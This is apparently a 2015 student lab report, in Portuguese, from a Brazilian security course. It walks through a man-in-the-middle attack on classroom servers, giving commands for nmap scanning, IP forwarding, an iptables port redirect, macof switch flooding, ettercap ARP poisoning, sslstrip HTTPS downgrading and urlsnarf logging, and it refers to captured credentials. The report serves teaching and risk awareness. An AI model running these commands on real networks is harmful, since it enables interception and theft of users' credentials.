faculdade de tecnologia senac goiás henrique ferreira da silva
Transcrição
faculdade de tecnologia senac goiás henrique ferreira da silva
FACULDADE DE TECNOLOGIA SENAC GOIÁS HENRIQUE FERREIRA DA SILVA ADELTON HENRIQUE ALINE GRAZIELLE NUNES ABISHAI LEMES BORGES NETO PROJETO INTEGRADOR GOIANIA 2015/1 HENRIQUE FERREIRA DA SILVA ADELTON HENRIQUE ALINE GRAZIELLE NUNES ABISHAI LEMES BORGES NETO MITM Trabalho de Tecnologia de Redes Apresentado a Faculdade de Tecnologia Senac Goiás. Curso de graduação tecnologia em Segurança da Informação. Orientador: Prof. Marissol Martins GOIÂNIA 2015/1 Sistema Operacional utilizado para intermediar o ataque: Kali Linux 1.1.0a. Ferramentas utilizadas: Nativas do O.S (Nmap, Ettercap, Arpspoof, Macof, sslstrip, urlsnarf). Abaixo passo a passo do experimento realizado em servidores próprios configurados em sala de aula Acessando o terminal: #ifconfig (verificando interfaces de rede ) #route (verifica a tabela de rotas e gateway) #nmap –sP rede (Faz um scanner na rede para descobrir host ativos ) #echo 1 > /proc/sys/net/ipv4/ip_forward ( Habilita o encaminhamento de pacotes pelo Kernel) #iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT – to-port 10000 (Direciona o trafego que chega na porta 80 para a porta 10000) #macof (Inunda a tabela mac do switch) Abaixo printscreen da tabela mac do switch antes e depois do ataque ser iniciado. Antes: Depois: #ettercap –T –q –i eth0 –M ARP:REMOTE /ip da vitima/ /ip do roteador/ (ettercap: faz a capitura do trafego. No caso abaixo foi usado para a rede toda) Explicando as funções -T – Usar em modo texto somente -q – Usar modo silencioso -i – Definição de interface. SSLStrip - é uma ferramenta que pode passar as ligações SSL a ligações normais sem SSL, permitindo assim que os dados que deveriam estar encriptados passarem sem qualquer tipo de proteção. #sslstrip –l 10000 (Mesma porta apontada no iptables) Urlsnarf gera log de acesso a sites #urlsnarf –i eth0 Abaixo imagem de log gerado pelo urlsnarf Abaixo printscreen de credencias capituradas com sslstrip e urlsnarf Atenção: Roubo de Informações é CRIME, sujeito as penalidades da Lei: 12.737, o mal uso do conteúdo deste artigo é de sua total responsabilidade pois o mesmo tem como objetivo destacar os riscos que estamos expostos a realizar um simples acesso a conta do Facebook em uma LanHouse por exemplo.
Documentos relacionados
Relatório Man-In-The
Para realizar o ataque será necessário o estudo da ferramenta e técnicas já desenvolvidas para o ataque de transbordamento da tabela CAM do switch e para ataque de Man-In-The-Middle
Leia maisfaculdade de tecnologia senac goiás henrique ferreira da silva
FACULDADE DE TECNOLOGIA SENAC GOIÁS
Leia mais